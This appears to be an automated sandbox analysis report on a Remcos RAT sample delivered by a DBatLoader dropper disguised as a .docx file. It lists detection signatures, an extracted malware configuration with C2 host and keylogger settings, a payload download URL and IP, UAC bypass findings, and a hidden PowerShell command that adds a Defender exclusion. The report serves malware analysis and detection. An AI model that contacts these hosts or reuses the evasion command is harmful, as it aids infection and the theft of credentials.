Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		31_2_0458BB30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db		31_2_0458BB30

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\SysWOW64\colorcpl.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: cmd.exe

31_2_0458569A

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.170.55.202	wcmanagers.com	United States		20454	SSASN2US	true

Contacted Domains

Name	IP	Active
wcmanagers.com	108.170.55.202	true
198.187.3.20.in-addr.arpa	unknown	unknown
www.vipguyclassproject2024.space	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://wcmanagers.com/Er9/233_Pyemdbrdpps	true	Avira URL Cloud: safe	unknown
www.vipguyclassproject2024.space	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: www.vipguyclassproject2024.space

Avira URL Cloud: Label: malware

Found malware configuration

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://wcmanagers.com/Er9/233_Pyemdbrdpps"]}
Source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Pyemdbrd.PIF	ReversingLabs: Detection: 44%
Source: C:\Users\Public\Libraries\Pyemdbrd.PIF	Virustotal: Detection: 50%			Perma Link

Multi AV Scanner detection for submitted file

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	ReversingLabs: Detection: 44%
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Virustotal: Detection: 50%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Pyemdbrd.PIF

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045B3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

31_2_045B3837

Source: colorcpl.exe

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045874FD _wcslen,CoGetObject,

31_2_045874FD

UAC bypass detected (Fodhelper)

Source: C:\Users\Public\ger.exe

Registry value created: NULL C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:"

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Unpacked PE file: 0.2.#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe.2980000.1.unpack

Uses 32bit PE files

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: FodHelper.pdb source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: powershell.pdbUGP source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
Source:	Binary string: easinvoker.pdbH source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: reg.pdb source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr
Source:	Binary string: powershell.pdb source: xkn.exe, 00000016.00000000.1285526824.00007FF6C891A000.00000002.00000001.01000000.00000008.sdmp, xkn.exe.15.dr
Source:	Binary string: cmd.pdb source: alpha.exe, 00000008.00000000.1264413808.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000000.1266008004.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000A.00000002.1267795392.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000000.1268349543.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000C.00000002.1277417828.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000000.1277719216.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000E.00000002.1280383467.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000002.1284778384.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000011.00000000.1280701556.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000002.1361948594.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000015.00000000.1285093557.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000000.1301865429.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000017.00000002.1305805578.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000000.1390985382.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000026.00000002.1397949450.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000002.1415158264.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000002A.00000000.1400142537.00007FF64B592000.00000002.00000001.01000000.00000007.sdmp, alpha.exe.6.dr
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 00000012.00000002.1282544160.000001FCCC830000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000022.00000002.1389829508.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe, 00000022.00000000.1363110246.00007FF6EF4BB000.00000002.00000001.01000000.00000012.sdmp, per.exe.18.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 0000000D.00000002.1276914690.00000178283A0000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000018.00000002.1302899439.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000018.00000000.1302258700.00007FF7E0A10000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.13.dr

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	0_2_029858B4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	8_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	8_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	8_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	8_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	8_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	12_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	12_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	12_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	12_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	12_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	14_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	14_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	14_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	14_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	14_2_00007FF64B5635B8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B57823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	17_2_00007FF64B57823C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B572978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	17_2_00007FF64B572978
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B587B4C FindFirstFileW,FindNextFileW,FindClose,	17_2_00007FF64B587B4C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B561560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00007FF64B561560
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5635B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	17_2_00007FF64B5635B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589665
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04589253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	31_2_04589253
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0459C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	31_2_0459C291
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	31_2_0458C34D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	31_2_0458BD37
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_045CE879 FindFirstFileExA,	31_2_045CE879
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	31_2_0458880C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458783C FindFirstFileW,FindNextFileW,	31_2_0458783C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_04599AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	31_2_04599AF5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 31_2_0458BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	31_2_0458BB30

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_04587C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

31_2_04587C97

Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user\AppData\Local\Temp\D2F6.tmp	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Users\Public\Libraries\drbdmeyP.pif	File opened: C:\Users\user~1\AppData\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://wcmanagers.com/Er9/233_Pyemdbrdpps
Source: Malware configuration extractor	URLs: www.vipguyclassproject2024.space

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_0299D028 InternetCheckConnectionA,

0_2_0299D028

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 108.170.55.202 108.170.55.202

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SSASN2US SSASN2US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /Er9/233_Pyemdbrdpps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wcmanagers.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459663B Sleep,URLDownloadToFileW,

31_2_0459663B

Source: global traffic

HTTP traffic detected: GET /Er9/233_Pyemdbrdpps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wcmanagers.com

Source: global traffic	DNS traffic detected: DNS query: wcmanagers.com
Source: global traffic	DNS traffic detected: DNS query: www.vipguyclassproject2024.space
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

